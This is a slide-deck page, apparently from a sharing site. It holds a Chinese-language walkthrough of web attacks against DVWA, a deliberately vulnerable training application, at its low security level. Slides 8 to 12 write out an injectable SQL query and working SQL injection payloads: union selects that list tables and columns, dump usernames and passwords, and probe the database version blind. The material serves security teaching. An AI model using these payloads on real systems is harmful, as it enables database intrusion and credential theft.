Dvwa low level
2 likes2,461 views
This document provides an overview of common web vulnerabilities and techniques for exploiting them using a vulnerable web application called DVWA (Damn Vulnerable Web Application). It discusses low-level vulnerabilities like brute force attacks, command injection, CSRF, file inclusion and SQL injection. It then goes into more detail on different SQL injection techniques like concatenation, error-based detection, union queries, retrieving data from tables. It also covers blind SQL injection, file uploads, and both reflected and stored cross-site scripting vulnerabilities. The document appears to be an introduction or guide to using DVWA to learn about hacking web applications.
1 of 16
Downloaded 51 times
Dvwa low level
- 1. DVWA - Damn Vulnerable Web Application Dvwa low level
- 4. 3.CSRF
- 8. SQL 重組 $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 檢測是否有錯誤 1' and 1=1# 組合後變成 "select first_name,last_name form users where user_id = '1' and 1=1#";
- 9. 5.SQL Injection 1' order by 1# 1' union all select 1,2# 1' union all select user(),database()# 1' union all select null,table_name from information_schema.tables# 1' union all select null,table_name from information_schema.tables where table_schema = 'dvwa'# 1' union all select null,column_name from information_schema.columns where table_schema ='dvwa'#
- 10. 5.SQL Injection 1' union all select user,password from users#
- 12. 6.Blind SQL Injection 我們可以先 檢測版本 1' union all select null,substring(@@version,1,1)=4#
- 13. 7.File Upload
- 14. 8.Reflected Cross Site Scripting (XSS)
- 15. 9.Stored Cross Site Scripting (XSS)
- 16. Dvwa medium level To be continue vance@hst.tw